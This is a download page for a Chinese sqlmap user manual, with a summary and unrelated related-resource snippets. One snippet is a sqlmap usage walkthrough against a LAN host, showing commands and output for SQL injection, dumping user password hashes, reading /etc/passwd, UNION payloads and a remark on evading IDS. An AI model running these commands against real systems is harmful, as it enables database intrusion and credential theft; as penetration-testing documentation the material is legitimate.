file-type

sqlmap用户手册:数据库注入测试宝典

PDF文件

sqlmap
下载需积分: 15 | 386KB | 更新于2024-07-22 | 178 浏览量 | 3 下载量 举报 收藏
download 立即下载
"这是关于sqlmap使用文档的摘要,由Bernardo Damele A.G.和Miroslav Stampar编写,版本0.9,发布于2011年4月10日。文档详细介绍了sqlmap这个强大的自动化数据库注入工具,包括其功能、历史、下载与更新方法以及使用技巧。" sqlmap是一个开源的自动化工具,专门用于检测和利用SQL注入漏洞,它能够帮助安全研究人员或渗透测试人员更有效地测试目标系统是否存在数据库安全风险。以下是sqlmap的详细介绍: **1. 功能介绍** 1.1 **通用特性** sqlmap提供了多种通用功能,如自动识别SQL注入点,自动测试不同的注入技术,以及自动提取数据库中的数据。它支持多种数据库管理系统,如MySQL、PostgreSQL、Oracle等。 1.2 **指纹与枚举特性** 工具能够识别目标服务器的数据库类型、版本以及运行的Web应用程序,同时可以枚举数据库中的表和列,获取敏感信息。 1.3 **接管特性** sqlmap允许在成功注入后,进一步控制数据库,如执行任意SQL命令、读取/修改/删除数据,甚至完全接管数据库服务器。 **2. 历史版本** 自2006年起,sqlmap经历了多次更新和发展,每个年度都有新的功能添加和完善,如2011年的版本0.9,增强了用户体验和攻击效率。 **3. 下载与更新** 用户可以从官方网站或其他可信源下载sqlmap的最新版本,并通过内置的更新机制保持软件的最新状态。 **4. 使用方法** 4.1 **输出详细程度** 用户可以根据需要调整sqlmap的输出信息级别,从基本到详细,便于在不同场景下使用。 4.2 **目标设定** 可以直接指定目标URL,或者从Burp或WebScarab代理日志中解析目标,甚至加载HTTP请求文件作为目标地址。 4.3 **请求配置** 支持设置HTTP数据、Cookie、User-Agent、Referer等头信息,还可以处理HTTP协议认证和证书。 **5. 请求部分** 除了基本的URL目标,用户可以自定义HTTP请求的各个部分,包括数据、Cookie、User-Agent、Referer等,以适应复杂的注入环境。 sqlmap是一个强大的数据库注入工具,具备自动化、灵活和全面的特点,使得数据库安全测试变得更为高效。了解并熟练使用sqlmap,对于提高网络安全防护能力具有重要意义。

相关推荐

filetype

impacket-0.9.9.9

impacket-0.9.9.9,官方版本
filetype

sqlmap用户手册

sqlmap用户手册 (英文版) sqlmap -u "url"
filetype

sqlmap (懂的入)

Here is a list of major features implemented in sqlmap: * Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-end. Besides these four DBMS, sqlmap can also identify Microsoft Access, DB2, Informix and Sybase; * Extensive database management system back-end fingerprint based upon: o Inband DBMS error messages o DBMS banner parsing o DBMS functions output comparison o DBMS specific features such as MySQL comment injection o Passive SQL injection fuzzing * It fully supports two SQL injection techniques: o Blind SQL injection, also known as Inference SQL injection o Inband SQL injection, also known as UNION query SQL injection and it partially supports error based SQL injection as one of the vectors for database management system fingerprint; * It automatically tests all provided GET, POST, Cookie and User- Agent parameters to find dynamic ones. On these it automatically tests and detects the ones affected by SQL injection. Moreover each dynamic parameter is tested for numeric, single quoted string, double quoted string and all of these three type with one and two brackets to find which is the valid syntax to perform further injections with; * It is possible to provide the name of the only parameter(s) that you want to perform tests and use for injection on, being them GET, POST, Cookie parameters; * SQL injection testing and detection does not depend upon the web application database management system back-end. SQL injection exploiting and query syntax obviously depend upon the web application database management system back-end; * It recognizes valid queries by false ones based upon HTML output page hashes comparison by default, but it is also possible to choose to perform such test based upon string matching; * HTTP requests can be performed in both HTTP method GET and POST (default: GET); * It is possible to perform HTTP requests using a HTTP User-Agent header string randomly selected from a text file; * It is possible to provide a HTTP Cookie header string, useful when the web application requires authentication based upon cookies and you have such data; * It is possible to provide an anonymous HTTP proxy address and port to pass by the HTTP requests to the target URL; * It is possible to provide the remote DBMS back-end if you already know it making sqlmap save some time to fingerprint it; * It supports various command line options to get database management system banner, current DBMS user, current DBMS database, enumerate users, users password hashes, databases, tables, columns, dump tables entries, dump the entire DBMS, retrieve an arbitrary file content (if the remote DBMS is MySQL) and provide your own SQL SELECT statement to be evaluated; * It is possible to make sqlmap automatically detect if the affected parameter is also affected by an UNION query SQL injection and, in such case, to use it to exploit the vulnerability; * It is possible to exclude system databases when enumerating tables, useful when dumping the entire DBMS databases tables entries and you want to skip the default DBMS data; * It is possible to view the Estimated time of arrival for each query output, updated in real time while performing the SQL injection attack; * Support to increase the verbosity level of output messages; * It is possible to save queries performed and their retrieved value in real time on an output text file and continue the injection resuming from such file in a second time; * PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR (or similar) DBMS specific function. 昨天晚上实在忍不住,还是看了一些,然后测试了一下。里面的sql语句太过于简单,不过你可以定制。修改为更富在的语句。以绕过注入检测和其他IDS设 备。 稍晚一下,我编译一个dos版本的给你们。 1、首先安装python2.5。 2、然后进入sqlmap的目录,执行sqlmap 详细用法 1、sqlmap -u 注入点 2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,可以直接修改为百度 3、 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds [hh:mm:26] [INFO] url is stable [hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic [hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic [hh:mm:26] [INFO] GET parameter 'id' is dynamic [hh:mm:26] [INFO] testing sql injection on GET parameter 'id' [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable [hh:mm:26] [INFO] testing MySQL [hh:mm:26] [INFO] query: CONCAT('5', '5') [hh:mm:26] [INFO] retrieved: 55 [hh:mm:26] [INFO] performed 20 queries in 0 seconds [hh:mm:26] [INFO] confirming MySQL [hh:mm:26] [INFO] query: LENGTH('5') [hh:mm:26] [INFO] retrieved: 1 [hh:mm:26] [INFO] performed 13 queries in 0 seconds [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1 [hh:mm:26] [INFO] retrieved: 5 [hh:mm:26] [INFO] performed 13 queries in 0 seconds remote DBMS: MySQL >= 5.0.0 4、指定参数注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "id" [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds [hh:mm:18] [INFO] url is stable [hh:mm:18] [INFO] testing sql injection on parameter 'id' [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable [...] Or if you want to provide more than one parameter, for instance: $ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "cat,id" 5、指定方法和post的数据 python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" -- data "id=1&cat=2" 6、指定cookie,可以注入一些需要登录的地址 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie "COOKIE_VALUE" 7、通过代理注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118" 8、指定关键词,也可以不指定。程序会根据返回结果的hash自动判断 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE" 9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。 --remote-dbms 10、指纹判别数据库类型 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f 11、获取banner信息 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 12、获取当前数据库,当前用户,所有用户,密码,所有可用数据库。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- current-db current database: 'testdb' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users database management system users [5]: [*] 'debian-sys-maint'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'leboyer' [*] 'root'@'localhost' [*] 'testuser'@'localhost' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- passwords database management system users password hashes: [*] debian-sys-maint [1]: password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [*] root [1]: password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY [*] testuser [1]: password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs available databases [3]: [*] information_schema [*] mysql [*] testdb python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables -D "information_schema" Database: information_schema [16 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLLATIONS | | COLUMN_PRIVILEGES | | COLUMNS | | KEY_COLUMN_USAGE | | ROUTINES | | SCHEMA_PRIVILEGES | | SCHEMATA | | STATISTICS | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TABLES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- columns -T "user" -D "mysql" Database: mysql Table: user [37 columns] +-----------------------+------+ | Column | Type | +-----------------------+------+ | Alter_priv | enum | | Alter_routine_priv | enum | | Create_priv | enum | | Create_routine_priv | enum | | Create_tmp_table_priv | enum | | Create_user_priv | enum | | Create_view_priv | enum | | Delete_priv | enum | | Drop_priv | enum | | Execute_priv | enum | | File_priv | enum | | Grant_priv | enum | | Host | char | | Index_priv | enum | | Insert_priv | enum | | Lock_tables_priv | enum | | max_connections | int | | max_questions | int | | max_updates | int | | max_user_connections | int | | Password | char | | Process_priv | enum | | References_priv | enum | | Reload_priv | enum | | Repl_client_priv | enum | | Repl_slave_priv | enum | | Select_priv | enum | | Show_db_priv | enum | | Show_view_priv | enum | | Shutdown_priv | enum | | ssl_cipher | blob | | ssl_type | enum | | Super_priv | enum | | Update_priv | enum | | User | char | | x509_issuer | blob | | x509_subject | blob | +-----------------------+------+ 13、显示指定的文件内容,一般用于php python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file / etc/passwd /etc/passwd: --- root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/false backup:x:34:34:backup:/var/backups:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/ bin/bash inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash --- 14、执行你自己的sql语句。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" [hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1' [hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1 [hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY [hh:mm:19] [INFO] performed 118 queries in 0 seconds SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 'YYYYYYYYYYYYYYYY' 15、union注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union- check valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT NULL, NULL, NULL--&cat=2' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- union-use --banner [...] [hh:mm:24] [INFO] testing inband sql injection on parameter 'id' [hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability [hh:mm:24] [INFO] confirming inband sql injection on parameter 'id' [...] [hh:mm:24] [INFO] fetching banner [hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2 [hh:mm:24] [INFO] performed 1 queries in 0 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b - o "sqlmap.log" [...] [hh:mm:09] [INFO] fetching banner [hh:mm:09] [INFO] query: VERSION() [hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log [hh:mm:11] [INFO] performed 139 queries in 1 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- banner -o "sqlmap.log" --resume [...] [hh:mm:13] [INFO] fetching banner [hh:mm:13] [INFO] query: VERSION() [hh:mm:13] [INFO] retrieved the length of query: 26 [hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb [hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log banner:
filetype

Ibatis SQL Map的DTD文档解析与使用

这个文件是用来描述Ibatis SQL Map的配置文件应该遵循的规则,具体包括了Ibatis SQL Map的配置文件中可以使用哪些标签,以及这些标签的属性和内容该如何组织。 Ibatis sql map的DTD描述文档的内容包含了以下几个...
filetype

sql map用户手册.docx

使用 sqlmap,可以自动检测 Web 应用程序中的 SQL 注入漏洞,并提供了多种不同的检测模式和配置选项。用户可以根据需要选择合适的检测模式和配置选项来检测 Web 应用程序中的 SQL 注入漏洞。 sqlmap 的主要功能包括...
filetype

BeetlSQL 2.10中文文档

- **使用JDBCSQL**: 允许直接使用JDBC SQL语句。 #### 七、BeetlSQL注解 BeetSql还支持一系列注解来增强实体类的功能,例如: - `@AUTOID`: 自动为字段分配ID。 - `@TAIL`: 指定字段的后缀。 - `@IGNORE`: 忽略...
filetype

iBATIS开发指南:SQL Map配置与使用详解

使用SQL Map API编程时,开发者可以配置SQL Map,处理事务,进行批处理,并通过SqlMapClient执行SQL语句。文档中提供了多个示例代码,涵盖了更新、查询、分页查询、日志记录等多种操作。 iBATIS中文开发指南详细...
filetype

iBATIS SQL Map开发指南

这篇开发指南详细介绍了iBATIS SQL Map的特性和使用方法,适用于学习和参考。 在iBATIS SQL Maps的介绍中,SQL Map作为核心组件,其概念是通过XML配置文件来定义Java Bean与SQL语句之间的映射关系。SQL Map的工作...
filetype

iBATIS开发完全指南:快速精通SQL Map配置与使用

iBATIS开发指南,这是一份详细介绍如何使用iBATIS进行敏捷开发的文档。文档涵盖了SQLMap的核心概念、工作原理、安装步骤以及XML配置文件的详细解析,包括各个元素的用法,旨在帮助开发者快速掌握iBATIS的使用。 在...
filetype

使用Abator提升效率:iBATIS自动生成DAO与SQL Map教程

"这篇文档主要介绍了如何使用ibatis的自动生成工具Abator,旨在提升开发效率并规范代码质量。Abator能够自动创建DAO接口、DTO数据传输对象和SQL映射文件。文档提供了详细的环境配置、插件安装步骤以及功能应用实例。...
filetype

iBATIS SQL Map API开发指南详解

本文档是一份详细的iBATIS SQL Map API学习指南,由知名作者Clinton Begin撰写,并由刘涛翻译。iBATIS是一个开源的Java持久层框架,主要用于简化与数据库的交互,提高开发效率。SQL Map是iBATIS的一个核心组件,它将...
filetype

iBATIS开发指南:SQL Map详解

iBATIS开发指南是一本详细的中文文档,由Clinton Begin撰写并由刘涛翻译,专注于介绍如何使用iBATIS进行SQL Map的开发。该指南涵盖了从安装、升级到配置以及各种映射文件和语句的使用方法。 在iBATIS中,SQL Maps是...
filetype

iBATIS SQL Map 入门与配置教程

该教程旨在帮助初学者快速理解并上手 SQL Map,通过实例讲解如何使用其架构来处理复杂的数据访问需求。 SQL Map 架构的优势在于其灵活性,即使面对设计不佳的数据库或对象模型也能适应。然而,为了实现最佳性能和...
filetype

iBATIS开发指南:SQL Map深度解析

文档还讨论了如何处理不同类型的数据输入(如基本类型、Map类型)和输出(如基本类型、Map类型、复杂类型属性),并提供了避免N+1 Select问题的策略,包括延迟加载和联合查询,以及处理复杂类型集合属性的方法,以...
filetype

MTIBATIS入门教程:SQL Map详解与优化

对于参数,有多种类型支持,如基本类型、Map类型和复合类型,以及如何使用字符串替换(Substitution Strings)来动态构建查询。 ResultMaps部分着重于查询结果的映射,包括隐式结果映射、不同类型结果的处理(如...
filetype

iBATIS入门教程:SQL Map快速上手指南

在准备使用SQL Map时,作者强调了分析业务逻辑的重要性。这包括理解应用中的业务对象,比如本文例举的"Person"类,该类位于"examples/domain"包中。这个类包含了诸如"id", "firstName", "lastName", "birthDate", ...
filetype

iBATIS开发入门:SQL Map详解与配置

iBATIS开发指南是一份详细介绍如何使用iBATIS框架进行数据库操作的文档,针对版本2.0,作者Clinton Begin撰写了这份指南,刘涛进行了翻译。iBATIS的核心是SQL Maps,它利用XML配置文件来映射JavaBean与SQL语句,显著...
filetype

iBATIS SQL Map初学者教程:快速入门

"iBATIS SQL Map 入门教程" 这篇教程是针对初学者设计的,旨在引导学习者快速掌握 iBATIS SQL Map 的基本概念和应用。iBATIS 是一个流行的数据持久层框架,它允许开发者将 SQL 查询与 Java 代码分离,提供了更加...
filetype

sql map 里是否包含某个key

- **原理**:当参数类型为`Map`时,MyBatis允许在动态SQL中直接使用`_parameter.containsKey('keyName')`来检查指定键是否存在。如果存在,则执行对应的SQL片段。 - **语法格式**: ```xml ('keyName')"> AND ...
filetype

FreeRTOS内核详解(1) —— 临界段保护原理

什么是临界段 临界段用一句话概括就是一段在执行的时候不能被中断的代码段。 在 FreeRTOS 里面,这个临界段最常出现的就是对全局变量的操作,由于不同任务间可以切换运行,当一个任务在访问某个全局变量时,这时其他任务切入,改变了该全局变量,再回到上个任务时访问该变量已经不是当时的值,这种情况可能会导致不可意料的后果。 FreeRTOS 源码中就有多处临界段的处理,跟 FreeRTOS 一样,uCOS-II 和 uCOS-III 源码中都是有临界段的,而 RTX 的源码中不存在临界段。另外,除了 FreeRT
filetype

opencv-0.19.0-sources.jar

opencv-0.19.0-sources.jar
joollee
  • 粉丝: 0
上传资源 快速赚钱

最新资源